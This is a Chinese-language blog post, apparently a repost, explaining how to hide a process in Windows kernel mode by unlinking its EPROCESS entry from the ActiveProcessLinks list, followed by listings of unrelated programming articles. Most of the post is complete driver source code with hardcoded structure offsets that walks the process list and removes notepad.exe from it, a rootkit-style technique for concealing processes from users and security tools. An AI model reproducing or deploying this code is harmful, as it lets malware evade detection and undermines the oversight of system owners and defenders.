在windows內核模式下隱藏進程

原創 A8572785 2020-02-23 05:33

進程隱藏之內核實現

1、在內核模式下,系統爲每個進程維護了一個EPROCESS結構體,系統所有的進程是通過EPROCESS結構體中的一個ActiveProcessLinks指向的雙端鏈表連接起來的,通過winDBG內核調試工具就可以發現並獲取其相對於EPROCESS結構體的地址(0x88),這樣我們可以通過遍歷該循環鏈表找到我們的目的進程將其鏈表的節點刪除即可隱藏該進程。(EPROCESS中進程PID相對地址爲ox84,進程名字相對地址爲0x174)。

代碼如下:

/****************************
   在內核模式下隱藏進程
      sky_2012.12.13
****************************/

#include <NTDDK.h>
#define DWORD ULONG

void DriverUnload(IN PDRIVER_OBJECT Driver_Object);
NTSTATUS HelloDDKDispatchRoutine(IN PDEVICE_OBJECT pDevObj,
								 IN PIRP pIrp);

//根據進程Pid找到進程
DWORD FindProcessEPROCESS(PANSI_STRING PsName, OUT int* flg);

ANSI_STRING Process_Name;

NTSTATUS DriverEntry(IN PDRIVER_OBJECT Driver_Object,
					 IN PUNICODE_STRING RegisterPath)
{
	
	PLIST_ENTRY  pre_ActiveProcessLink;
	int flg = 0;
	DWORD preprocess = 0x00000000;
	CHAR *string1 = "notepad.exe";
	
	Driver_Object->MajorFunction[IRP_MJ_CREATE] = HelloDDKDispatchRoutine;
	Driver_Object->MajorFunction[IRP_MJ_CLOSE]  = HelloDDKDispatchRoutine;
	Driver_Object->DriverUnload = DriverUnload;
	
	//找到我們要保護的進程的前一個的EPROCESS
	
	RtlInitAnsiString(&Process_Name,string1);


	preprocess = FindProcessEPROCESS(&Process_Name,&flg);

	
	//根據進程的ActiveProcessLink刪除掉我們的目的進程的ActiveProcessLink的連表節點
	if(flg)
	{
		pre_ActiveProcessLink = (PLIST_ENTRY)(preprocess);
		pre_ActiveProcessLink->Flink = pre_ActiveProcessLink->Flink->Flink;
		pre_ActiveProcessLink->Flink->Blink = pre_ActiveProcessLink;
		KdPrint(("Delete Success!\n"));
	}
	else
	{
		KdPrint(("notepad.exe dos'nt exist!\n"));
	}
	
	return STATUS_SUCCESS;
}


DWORD FindProcessEPROCESS(PANSI_STRING PsName, OUT int* flg)
{
	ANSI_STRING CurName;
	PLIST_ENTRY   cut_ActiveProcessLink = 0x00000000;
	DWORD CUR_EPROCESS = 0x00000000;
	DWORD curent_id = 0;//記錄當前id
	DWORD start_id =0;
	int count = 0;//記錄id總數
	CUR_EPROCESS = (DWORD)PsGetCurrentProcess();
	curent_id = *((DWORD*)(CUR_EPROCESS + 0x84));
	start_id = curent_id;

	RtlInitAnsiString(&CurName,(char*)CUR_EPROCESS + 0x174);
	cut_ActiveProcessLink = (PLIST_ENTRY)(CUR_EPROCESS + 0x88);
	//如果相同
	if(!RtlCompareString(PsName, &CurName,FALSE))
	{
		*flg = 1;
		return ((DWORD)(cut_ActiveProcessLink->Blink));
	}
	//接着遍歷
	while(1)
	{
		count++;
		cut_ActiveProcessLink = cut_ActiveProcessLink->Flink;
		RtlInitAnsiString(&CurName,(char*)cut_ActiveProcessLink - 0x88 + 0x174);

		curent_id = *((DWORD*)((DWORD)cut_ActiveProcessLink - 0x88 + 0x84));
		if(!RtlCompareString(PsName,&CurName,FALSE))
		{
			*flg = 1;
			return ((DWORD)(cut_ActiveProcessLink->Blink));
		}
		else if (count>=1&&(start_id == curent_id))
		{
			KdPrint(("沒有找到!\n"));
			return 0x00000000;
		}
	}
}

//默認的例程

NTSTATUS HelloDDKDispatchRoutine(IN PDEVICE_OBJECT pDevObj,
								 IN PIRP pIrp)
{
	NTSTATUS status = STATUS_SUCCESS;
	KdPrint(("Enter HelloDDKDispatchRoutine\n"));
	// 完成IRP
	pIrp->IoStatus.Status = status;
	IoCompleteRequest(pIrp, IO_NO_INCREMENT );
	KdPrint(("Leave HelloDDKDispatchRoutine\n"));
	return status;
}

//設置卸載例程
void DriverUnload(IN PDRIVER_OBJECT Driver_Object)
{
	KdPrint(("DriverUnload!\n"));
}


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

信號量問題----父母子女四人喫水果

問題分析: 父親放蘋果  女兒喫蘋果  母親放梨子  兒子喫梨子, 盆子最多放N個水果 mutex = 1; 盆子剩下空間 = N 蘋果數 = 0 梨子數 = 0 父親: 盆子有空就放蘋果.滿了就不放了. 母親: 盆子有空就放梨子.滿

hu7324829 2020-07-08 11:13:17

書店管理系統---不完善

這是一個C語言寫的書店管理系統 主要缺點:0,不能保存數據,每次重新運行,數據會刷新;     1,收銀時會發生問題 #include "stdio.h" #include "stdlib.h" #include "string.h"

KuseBear 2020-07-08 11:07:33

MCU初始化流程——從上電到main()之間

說明: 以下介紹示例的MCU地址空間如下:             ROM空間爲:0x0000 0000 – 0x0000 8000                RAM空間爲:0x2000 0000 – 0x2000 2000     

jltsun 2020-07-08 11:00:06

求1+2+3+...+n,要求不能使用乘除法,for,while,if,else,switch,case等關鍵字以及條件判斷語句

方法一:利用構造函數和靜態數據成員 #include <iostream> using namespace std; class Temp { public: Temp() { ++N; Sum+=N; } stat

Wen_de_ll 2020-07-08 10:41:26

c++程序入門(二)——指針代碼舉例

題目1:輸入五個浮點數,存入數組中。然後分別按照升序和降序的方式排列輸出,再分別輸出最大值和最小值。 #include <iostream> using namespace std; const int M=5; int main

zhangying_496 2020-07-08 10:38:18

Open Supervised Device Protocol (OSDP) 總結

簡介性資料 What Is OSDP? 開放監視設備協議(OSDP)是安全行業協會(SIA)爲提高訪問控制和安全產品之間的互操作性而開發的訪問控制通信標準。OSDP v2.1.7目前正在成爲美國國家標準協會(ANSI)認可的標準,並且OS

xiyuan255 2020-07-08 10:33:42

STM32中enumeration特殊使用方法

                                                  STM32中enumeration特殊使用方法 定義如下: /*! * STM32 Pin Names */ #define MCU

yanlaifan 2020-07-08 07:48:26

C語言之變量內存體現(VS編譯器)

計算機中所有的數據都是以二進制形式表示的,一個字節(byte)=8位(bit)。 爲了便於書寫與理解,內存地址空間是用16進制的數據表示, 如0x8049324,因爲十六進制更簡短,換算的時候一位16進制數可以頂4位2進制數。(所

吃数据的猴子 2020-07-08 06:06:01

數據調度平臺系統二大種類及其實現方法與流程

什麼是調度系統 調度系統,更確切地說,作業調度系統(Job Scheduler)或者說工作流調度系統(workflow Scheduler)是任何一個稍微有點規模,不是簡單玩玩的大數據開發平臺都必不可少的重要組成部分。 除了Crontab

taskctl调度工具 2020-07-08 04:22:11

etl作業調度工具必備的10個功能屬性

概述 taskctl是一款國內開源的ETL工具,純C編寫,可以在Window、Linux、Unix上運行。 說白了就是,很有必要去理解一般ETL工具必備的特性和功能,這樣才更好的掌握taskctl的使用。 今天主要先描述ETL工具的通用功

taskctl调度工具 2020-07-08 03:42:10

PAT A1041. Be Unique (20)

Be Unique (20) 時間限制 100 ms 內存限制 65536 kB 代碼長度限制 16000 B 判題程序 Standard 作者 CHEN, Yue Being unique is so i

jackiewoo_ 2020-07-08 02:19:27

32位和64位與虛擬地址之間和字節數的問題

32位是cpu一次處理的位數,即32位4字節,相當於地址的寬度,即sizeof(*p);虛擬地址大小爲4G,即有2的32次方個地址,從32個0到32個1個地址;64位是cpu一次處理的位數,即64位8字節,相當於地址的寬度,即sizeof

dreamofprogramming 2020-07-08 01:47:23

C語言-第幾天,定義一個結構體變量(包括年、月、日)。計算該日在本年中是第幾天,注意閏年問題。

1050: C語言-第幾天 題目描述 定義一個結構體變量(包括年、月、日)。計算該日在本年中是第幾天,注意閏年問題。 輸入 年月日 輸出 當年第幾天 樣例輸入 2000 12 31 樣例輸出 366 # include<stdio

Du798566 2020-07-08 01:05:20

c和c++中NULL和0的區別?!

NULL和0的區別 1,什麼是空指針常量(null pointer constant)? [6.3.2.3-3] An integer constant expression with the value 0, or such an

chris 007 2020-07-08 01:00:59

C語言四大存儲區域總結

一、簡單的介紹一下四個區域: 1.代碼區--------主要存儲程序代碼指令,define定義的常量。 2.數據區------主要存儲全局變量(常量),靜態變量(常量),常量字符串。 3.棧區--------主要存儲局部變量,棧區上的內容

yue_jijun 2020-07-08 00:33:51